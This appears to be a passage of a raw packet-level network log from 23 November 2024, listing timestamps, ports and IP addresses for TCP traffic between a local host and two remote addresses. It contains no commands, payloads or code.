Nov 23, 2024 07:09:42.233854055 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.233930111 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.234117031 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.234236956 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.234280109 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.235390902 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.235501051 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.235527992 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.235577106 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.236655951 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.236726046 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.236751080 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.236793041 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.237901926 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.237948895 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.237991095 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.238183975 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.239175081 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.239275932 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.239322901 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.240425110 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.240475893 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.240535975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.240581036 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.241672039 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.241736889 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.241777897 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.241835117 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.242933989 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.243011951 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.243108034 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.243196011 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.244189024 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.244246006 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.244291067 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.244334936 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.245449066 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.245495081 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.245554924 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.245594025 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.246697903 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.246809959 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.246835947 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.246855021 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.247980118 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.248028994 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.248071909 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.248119116 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.249207020 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.249254942 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.249305964 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.249346018 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.250499010 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.250546932 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.250587940 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.250628948 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.251739025 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.251795053 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.251852989 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.252047062 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.252991915 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.253051043 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.253098965 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.253149033 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.254259109 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.254303932 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.254307032 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.254348993 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.255547047 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.255630970 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.255686045 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.256800890 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.256851912 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.256916046 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.257081985 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.258055925 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.258124113 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.258147955 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.258186102 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.259325981 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.259378910 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.259426117 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.259475946 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.260615110 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.260659933 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.260730982 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.260793924 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.262325048 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.262381077 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.262409925 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.262454987 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.263113022 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.263169050 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.263226032 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.263467073 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.264631033 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.264730930 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.264750004 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.264803886 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.265613079 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.265670061 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.265693903 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.265796900 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.266877890 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.266946077 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.266998053 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.267074108 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.268130064 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.268177986 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.268181086 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.268219948 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.269402981 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.269449949 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.269495010 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.269537926 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.270653009 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.270721912 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.270770073 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.270875931 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.271951914 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.272016048 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.272069931 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.272119045 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.273156881 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.273205996 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.273269892 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.273320913 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.357168913 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.357256889 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.357285023 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.357422113 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.357784986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.357844114 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.357867002 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.358092070 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.358779907 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.358841896 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.358892918 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.358930111 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.360023975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.360090017 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.360165119 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.360218048 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.361289024 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.361373901 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.361423016 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.362545013 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.362574100 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.362596989 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.362627029 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.363859892 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.363920927 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.363946915 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.363984108 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.365031958 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.365104914 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.365138054 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.365431070 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.366306067 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.366394043 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.366427898 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.366522074 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.367599010 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.367650986 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.367681980 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.367985964 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.368841887 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.368918896 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.368921041 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.368961096 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.370094061 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.370121956 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.370157003 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.370182991 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.371350050 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.371423006 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.371423960 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.371632099 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.372612953 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.372673988 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.372710943 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.372760057 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.373857975 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.373910904 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.373946905 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.373986959 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.375099897 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.375147104 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.375205040 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.375246048 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.376382113 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.376426935 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.376452923 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.376492977 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.377691984 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.377794981 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.377839088 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.378909111 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.379014969 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.379079103 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.380186081 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.380250931 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.380278111 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.381181002 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.381364107 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.381405115 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.434839964 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.434916019 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.434967995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.435343027 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.435388088 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.435448885 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.435570002 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.436518908 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.436602116 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.436683893 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.436683893 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.437678099 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.437748909 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.437774897 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.437813997 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.438858986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.438905954 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.438914061 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.438944101 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.440015078 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.440104961 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.440109968 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.440143108 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.441167116 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.441267014 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.441312075 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.442300081 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.442349911 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.442387104 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.442440987 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.443481922 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.443542957 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.443579912 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.443639994 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.444664955 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.444715023 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.444772959 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.444960117 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.445802927 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.445852041 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.445946932 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.446002960 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.446975946 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.447063923 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.447099924 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.447135925 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.448139906 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.448199987 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.448247910 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.448299885 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.449295998 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.449345112 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.449393034 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.449470043 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.450454950 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.450548887 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.450560093 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.450597048 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.451611996 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.451662064 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.451709986 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.451756954 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.452814102 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.452914953 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.452955961 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.453941107 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.454015017 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.454039097 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.454088926 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.455091000 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.455140114 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.455185890 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.455265999 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.456254005 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.456353903 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.456408024 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.457427979 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.457495928 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.457576990 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.457819939 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.458583117 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.458632946 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.458700895 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.458792925 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.459760904 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.459809065 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.459875107 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.459927082 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.460918903 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.461030960 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.461090088 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.461121082 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.462083101 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.462148905 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.462188959 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.462250948 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.463243961 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.463324070 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.463393927 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.463443995 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.464411974 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.464487076 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.464519024 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.464642048 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.465549946 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.465616941 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.465682030 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.465725899 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.466705084 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.466828108 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.466897011 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.467884064 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.467991114 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.467992067 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.468072891 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.469036102 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.469099998 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.469162941 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.469269037 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.470196962 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.470288038 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.470320940 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.470366955 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.471393108 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.471457958 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.471493006 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.471544027 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.472523928 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:42.472680092 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:42.477719069 CET	49876	443	192.168.2.6	23.219.161.135
Nov 23, 2024 07:09:42.477770090 CET	443	49876	23.219.161.135	192.168.2.6
Nov 23, 2024 07:09:42.478152037 CET	49876	443	192.168.2.6	23.219.161.135
Nov 23, 2024 07:09:42.478430033 CET	49876	443	192.168.2.6	23.219.161.135
Nov 23, 2024 07:09:42.478449106 CET	443	49876	23.219.161.135	192.168.2.6
